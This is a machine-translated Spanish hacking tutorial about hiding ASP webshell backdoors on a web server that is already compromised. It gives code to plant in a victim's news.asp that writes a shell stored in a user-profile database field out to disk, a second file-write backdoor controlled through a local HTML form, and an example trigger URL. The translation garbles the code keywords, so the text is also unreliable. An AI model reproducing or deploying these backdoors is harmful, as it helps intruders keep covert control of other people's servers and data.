Prefacio: Ha pasado mucho tiempo, desde el administrador del sitio inicial hasta las varias puertas traseras ASP populares ahora. Creo que la mayoría de los administradores de red pueden nombrar estos webshells clásicos, como Haiyang, Veteran, Blue Screen, etc. Los administradores de red pueden nombrarlos. Aprendí el método de búsqueda de palabras clave para buscar estos troyanos. Por supuesto, si desea ocultar la puerta trasera en la actualidad, debe usar algunas habilidades. Como dice el refrán, "El Buda es un pie". alto, y yo mido un pie de alto."
No niego que escribir el troyano asp en un archivo de imagen como se mencionó anteriormente es un buen método. De hecho, se puede escribir no sólo en imágenes, sino también en archivos mp3 y doc.
El método decopiar nombre/parámetro de archivo + nombre de archivo/parámetro para generar el nombre de archivo
se puede usar de manera flexible para lograr el propósito de ocultar archivos. Los parámetros específicos son /a en modo de código acsic, /b en modo binario, así que lo haré. No entre en demasiados detalles. En cuanto a cómo cargar webshell, qué es webshell no está dentro del alcance de este artículo. De lo que vamos a hablar hoy es de cómo poner la puerta trasera en la base de datos con el sufijo .mdb. La premisa es que después de obtener un webshell...
Como sabemos, muchos sitios tienen que completar muchas cosas cuando. registro de usuarios, tales como: nombre de usuario, contraseña, QQ, correo electrónico, perfil personal, número de teléfono, información de contacto, dirección, etc. También habrá tablas, campos y valores correspondientes a la base de datos. Lo que quiero hacer hoy es registrar un usuario y escribir el código de shell en mi perfil personal, y luego modificar un archivo en su sitio cuando este archivo se active al usarlo, colocaré el código de shell en mi currículum personal. hasta el directorio actual.
Sin más preámbulos, echemos un vistazo al código:
<%
si solicitud("acción")="firefox" entonces
fname=solicitud.querystring("fn")
tname=solicitud.querystring("tn")
bname=solicitud.querystring("bn")
id=solicitud.querystring("id")
idvalor=solicitud.querystring("idv")
establecer rs=servidor.createobject("ADODB.recordset")
sql="seleccione "& bname & " de "&tname& " donde "&id&"="&idvalue&""""
rs.open sql, conexión, 1,3
si no rs.eof entonces
contenido=rs(bnombre)
demás
respuesta.escribir "Nada"
terminar si
establecer fso=Server.createObject("Scripting.FileSystemObject")
establecer txtfile=fso.createtextfile(servidor.mappath(fname))
txtfile.writeline(contenido)
archivotxt.cerrar
terminar si
%>
Agregue el código anterior a un archivo del sitio, como news.asp. Según la información que conocemos, luego de registrarse en su sitio, descargue la base de datos para ver la estructura. El nombre de Firefox que registré está en la tabla de usuarios y su valor de identificación es 119. El campo de la tabla utilizado para almacenar mi currículum registrado es jl.
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
Luego, cuando lo usemos, podemos escribir un webshell llamado firefox.asp en el mismo directorio que news.asp. Se puede decir que lo anterior es uno de los miles de métodos de ocultación. A continuación, hablemos de otro método de ocultación más conveniente. Este método no tiene nada que ver con el sufijo mdb.
De manera similar, todavía modificamos news.asp e insertamos el siguiente código en el news.asp de la otra parte:
<%
si solicitud("acción")="firefox" entonces
n=solicitud.formulario("n")
c=solicitud.formulario("c")
establecer fso=Server.createObject("Scripting.FileSystemObject")
establecer txtfile=fso.createtextfile(servidor.mappath(n))
archivotxt.writeline(c)
archivotxt.cerrar
terminar si
%>
Este código es relativamente simple y puede considerarse como el lado del servidor de un caballo de Troya. Utilice este código cuando lo utilice:
<HTML><CABEZAL>
<META http-equiv=Tipo de contenido content="text/html; charset=gb2312">
<title>Alianza Tecnológica Fst Firefox[www.wrsky.com]</title>
<FORM action=" http://localhost/config.asp?action ... método=post>
<META content="MSHTML 6.00.2900.2180" nombre=GENERADOR></HEAD>
<CUERPO>Nombre:<Tamaño de ENTRADA=50
nombre=n ancho="32"><BR><BR>Shell:<TEXTAREA nombre=c filas=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
Cambie el código anterior: "http://localhost/config.asp?action= Reemplazar "firefox" con la dirección de su servidor y guárdelo como un archivo .htm local. Después de abrirlo localmente, defina el nombre del archivo, el contenido del archivo y el envío remoto que se generará. Esta es otra forma de dejar una puerta trasera.